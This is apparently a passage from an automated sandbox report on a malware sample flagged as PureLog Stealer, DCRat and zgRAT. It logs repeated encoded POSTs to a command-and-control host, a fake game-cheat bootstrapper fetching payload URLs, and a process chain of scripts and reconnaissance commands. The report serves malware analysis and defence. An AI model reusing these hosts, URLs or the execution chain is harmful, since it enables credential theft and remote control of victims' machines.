Dec 15, 2024 04:19:01.422833920 CET	793	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:19:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GGMrvRA0TOZRjxRMK2L074gZvMISvu72hBAWzDrZBLHbmpTGzR4tMchYMXfie59zKDJEB9SeP%2Fp1OiwY23ZoxJMuUI0anI0bmI3v%2BRTGMKWKeXEv36J6L5Ac1Uw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a2778cb0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8361&min_rtt=1608&rtt_var=14110&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=26241&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49971	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:19:01.664143085 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:19:02.015698910 CET	2536	OUT	Data Raw: 50 54 43 5f 5f 5b 58 5f 5d 5a 56 51 50 5f 57 51 55 50 5e 42 5a 53 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTC__[X_]ZVQP_WQUP^BZS[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$<=>Y=*+[!(+Z#%-.X%%W)300=9<2-+.F'#P
Dec 15, 2024 04:19:02.749865055 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:19:03.006068945 CET	793	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:19:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n61akKvFpZ2seZCMm5kCm%2Bbsx8qAQ2eiZZwQLRNqgD55GeW1yHDzp%2FdDd0GfQ9l70zF5smpaIkXVA3399fz2hAPzMyda4aJuYlElbIC6xzTodAYUGIXFoH3lk2w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a313b974264-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6931&min_rtt=1860&rtt_var=10839&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=34410&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49975	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:19:03.262584925 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:19:03.607428074 CET	2536	OUT	Data Raw: 50 56 46 5b 5a 5c 58 54 5d 5a 56 51 50 5e 57 5a 55 54 5e 45 5a 56 5b 5e 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PVF[Z\XT]ZVQP^WZUT^EZV[^YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$)-:X=9("?>+.$!<8Z%=%&>U>X06\+&,;.F'#P ?
Dec 15, 2024 04:19:04.347100019 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:19:04.582813978 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jcpdxog5PIs4xJn%2FIOQeVZT0fHuixZRc50WuIxhmSt3Tm9o0bpCpr8W6aoKI4IhWt63pONHO04O6IbGhdEPDX2WhDjgIThdK%2F0HoXo%2BheMubi4nA4sLfUD7lcUQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a3b3d4cc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4251&min_rtt=1605&rtt_var=5894&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=64108&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49980	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:19:13.296689987 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:19:13.611010075 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:19:13.611255884 CET	2536	OUT	Data Raw: 55 50 46 5d 5f 56 58 57 5d 5a 56 51 50 5d 57 5a 55 57 5e 45 5a 53 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UPF]_VXW]ZVQP]WZUW^EZS[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'<=*) "C<>+Y!<<Y'.&>:)'Z%=5= %,+.F'#P 3
Dec 15, 2024 04:19:14.171199083 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bw3nfnyeq0AEkP6kJBTejZppLACnGNg05wJTAW1J4KKJREl8XDPoQ2cLhCjnd%2F81M8nBPhhjZgqcJ%2FwU55NocH0O6qEOpgxnqJGvtDE9IZF34zumzS8Fetqa%2Fp0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a751cfb0f3f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4525&min_rtt=1660&rtt_var=6354&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=59383&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.93.27	443	7532	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 03:17:03 UTC	81	OUT	GET /asset/discord.json HTTP/1.1 Host: getsolara.dev Connection: Keep-Alive
2024-12-15 03:17:04 UTC	1044	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:03 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wd08ZkaWL5uJDCZVy%2FIbn23guWjHM1DIS5oVR4FAbxexfTpXxwfXPT7AjA3fvOnjGSqLMy%2F3UK9q%2FxMsVztfxUCBeIJiU81Q0zzDuPSypxZNkqwndP97OYuXn0oTZ89o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8f23474bb98942e6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2064&min_rtt=2061&rtt_var=779&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=695&delivery_rate=1399808&cwnd=197&unsent_bytes=0&cid=d67080385c7fbfec&ts=487&x=0"
2024-12-15 03:17:04 UTC	109	IN	Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
2024-12-15 03:17:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.93.27	443	7532	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 03:17:07 UTC	56	OUT	GET /api/endpoint.json HTTP/1.1 Host: getsolara.dev
2024-12-15 03:17:08 UTC	1045	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:08 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"75d0cd5c955470ce04c6372b65c32d37" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvvmxDjoULanGSuk1h4mnd8c6wDURqDgAXuzdyw9iaMqbhGswsCZjoEw4W9HbIu738f9LvPCFHXoS4LJ8f5V5Y%2FbUf31G%2BwmB3iqRLvoDJ8vGUJbLo8120vHpehxrT%2BB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8f234766bd32423b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3861&min_rtt=1622&rtt_var=2105&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2814&recv_bytes=694&delivery_rate=1800246&cwnd=226&unsent_bytes=0&cid=56fc911cad3bdb17&ts=469&x=0"
2024-12-15 03:17:08 UTC	324	IN	Data Raw: 32 31 34 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 62 37 31 63 31 35 30 63 37 63 31 66 34 30 64 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 33 32 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 38 35 62 31 62 30 37 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73 Data Ascii: 214{ "BootstrapperVersion": "1.23", "SupportedClient": "version-b71c150c7c1f40de", "SoftwareVersion": "3.132", "BootstrapperUrl": "https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
2024-12-15 03:17:08 UTC	215	IN	Data Raw: 7a 69 70 22 2c 0a 20 20 20 20 22 56 65 72 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 33 30 39 64 66 65 34 38 30 32 62 36 33 30 65 36 61 38 66 32 37 32 33 36 34 38 38 39 66 63 66 31 65 63 36 61 32 39 62 39 63 63 37 31 64 62 34 39 36 65 62 36 33 34 33 39 36 64 33 63 36 39 63 61 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 22 0a 7d 0d 0a Data Ascii: zip", "VersionUrl":"https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"309dfe4802b630e6a8f272364889fcf1ec6a29b9cc71db496eb634396d3c69ca", "Changelog":"[+]"}
2024-12-15 03:17:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	128.116.123.3	443	7532	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 03:17:11 UTC	119	OUT	GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 Host: clientsettings.roblox.com Connection: Keep-Alive
2024-12-15 03:17:11 UTC	576	IN	HTTP/1.1 200 OK content-length: 119 content-type: application/json; charset=utf-8 date: Sun, 15 Dec 2024 03:17:11 GMT server: Kestrel cache-control: no-cache strict-transport-security: max-age=3600 x-frame-options: SAMEORIGIN roblox-machine-id: 53796226-480e-d5f5-e5ec-a51414ea884c x-roblox-region: us-central_rbx x-roblox-edge: fra2 report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1} connection: close
2024-12-15 03:17:11 UTC	119	IN	Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 34 2e 31 2e 36 35 34 30 34 37 37 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 62 37 31 63 31 35 30 63 37 63 31 66 34 30 64 65 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 31 2c 20 36 35 34 30 34 37 37 22 7d Data Ascii: {"version":"0.654.1.6540477","clientVersionUpload":"version-b71c150c7c1f40de","bootstrapperVersion":"1, 6, 1, 6540477"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.20.22.46	443	7532	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 03:17:14 UTC	99	OUT	GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1 Host: www.nodejs.org Connection: Keep-Alive
2024-12-15 03:17:15 UTC	497	IN	HTTP/1.1 307 Temporary Redirect Date: Sun, 15 Dec 2024 03:17:15 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: close Cache-Control: public, max-age=0, must-revalidate location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi strict-transport-security: max-age=31536000; includeSubDomains; preload x-vercel-id: iad1::c4cjx-1734232635426-6a904e8eb56d CF-Cache-Status: DYNAMIC X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8f234791dc0580dc-EWR
2024-12-15 03:17:15 UTC	20	IN	Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a Data Ascii: fRedirecting...
2024-12-15 03:17:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:16:58
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\wmdqEYgW2i.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wmdqEYgW2i.exe"
Imagebase:	0x400000
File size:	4'851'200 bytes
MD5 hash:	8576F95A0E018025E8B46367AE311E83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1679810718.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1687516055.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:16:59
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
Imagebase:	0x19018a60000
File size:	819'200 bytes
MD5 hash:	02C70D9D6696950C198DB93B7F6A835E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:16:59
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:16:59
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Imagebase:	0xb10000
File size:	4'022'512 bytes
MD5 hash:	4680B7118D5D69D9D9ACA7265A07FA8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1689383384.0000000006112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1690322216.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:17:00
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe"
Imagebase:	0xa40000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:17:00
Start date:	14/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /c ipconfig /all
Imagebase:	0x7ff7cdc60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:17:00
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:17:01
Start date:	14/12/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff769f60000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:17:04
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:17:04
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:17:04
Start date:	14/12/2024
Path:	C:\ComponentReviewperfmonitor\Mscrt.exe
Wow64 process (32bit):	false
Commandline:	"C:\ComponentReviewperfmonitor/Mscrt.exe"
Imagebase:	0xdb0000
File size:	3'700'736 bytes
MD5 hash:	E7870CD0C30A52066C454C15A5A5A2F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000000.1735972234.0000000000DB2000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentReviewperfmonitor\Mscrt.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\Mscrt.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:17:10
Start date:	14/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat"
Imagebase:	0x7ff7cdc60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:17:10
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:17:10
Start date:	14/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff77d030000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:17:10
Start date:	14/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff785c90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:17:15
Start date:	14/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7532 -s 2204
Imagebase:	0x7ff77b750000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:17:19
Start date:	14/12/2024
Path:	C:\ComponentReviewperfmonitor\Mscrt.exe
Wow64 process (32bit):	false
Commandline:	"C:\ComponentReviewperfmonitor\Mscrt.exe"
Imagebase:	0x40000
File size:	3'700'736 bytes
MD5 hash:	E7870CD0C30A52066C454C15A5A5A2F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 00007FFD9B886DB0 Relevance: .9, Instructions: 938COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2104045733.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953bdcb76e41c3631428042d46307c8fd39b2fae0986bd1ef3a3434b9d4e32f7
